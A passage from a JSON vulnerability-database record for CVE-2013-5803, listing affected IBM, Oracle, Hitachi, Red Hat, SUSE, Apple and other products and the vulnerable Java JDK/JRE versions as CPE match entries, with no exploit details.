"vendor": "ibm", "version": null }, { "model": "websphere lombardi edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.143" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.0" }, { "model": "jrockit r27.6.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.4" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere lombardi edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "cosminexus application server enterprise version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere dynamic process edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli storage productivity center fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.14" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.9" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.5" }, { "model": "websphere dynamic process edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.8" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "cosminexus developer version 05-01-/l", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus developer professional version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "jrockit r27.7.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "cosminexus application server enterprise version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.141" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "ucosminexus application server enterprise 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.12" }, { "model": "ucosminexus application server enterprise 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "cosminexus developer professional version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "cosminexus client version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "jrockit r28.1.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer light version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cosminexus studio version 05-00-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus developer professional version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus client 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "cosminexus developer professional version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere process server hypervisor edition for novell suse", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.5" }, { "model": "java se embedded 7u40", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "cosminexus primary server base 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.3" }, { "model": "ucosminexus developer standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere process server on z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.4" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.34" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "ucosminexus application server standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "jrockit r28.2.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus application server standard version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.6" }, { "model": "cosminexus application server standard version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.145" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus client version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "505-01" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.4" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "jrockit r28.2.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus primary server base 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" } ], "sources": [ { "db": "BID", "id": "63082" }, { "db": "JVNDB", "id": "JVNDB-2013-004699" }, { "db": "NVD", "id": "CVE-2013-5803" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "r27.7.6", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update60:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update60:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update40:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 